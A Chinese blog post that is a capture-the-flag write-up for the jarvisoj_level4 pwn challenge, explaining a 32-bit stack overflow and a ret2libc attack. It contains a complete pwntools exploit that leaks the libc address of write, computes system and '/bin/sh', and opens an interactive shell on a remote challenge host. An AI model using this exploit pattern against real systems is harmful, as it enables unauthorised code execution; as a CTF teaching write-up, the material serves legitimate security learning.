jarvisoj_level4

原创 于 2021-11-25 10:05:40 发布 · 990 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

这篇博客讲述了作者通过checksec检测发现jarvisoj_level4中的栈溢出漏洞,利用ROP技术构造payload,结合ELF文件和gdb定位,最终实现从本地库 libc 寻找system和/bin/sh,完成经典的ret2libc攻击流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

jarvisoj_level4

使用checksec查看:
在这里插入图片描述
NX,估计还是一道栈题目,拉进IDA中查看:
在这里插入图片描述
主函数中给出了漏洞函数,跟进查看:
在这里插入图片描述
read()读取了0x100buf变量距离ebp0x88,存在栈溢出。

程序没有system/bin/sh,需要自己泄露libc去找,一道标准的ret2libc题目。

exp:

from os import sendfile
from pwn import *

#start
r = remote("node4.buuoj.cn",27632)
# r = process("../buu/jarvisoj_level4")
elf = ELF("../buu/jarvisoj_level4")
libc = ELF("../buu/ubuntu16(32).so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

#attack
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) +p32(write_got) +p32(4)
r.sendline(payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2
payload = b'M'*(0x88+4) + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
r.sendline(payload)

r.interactive()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值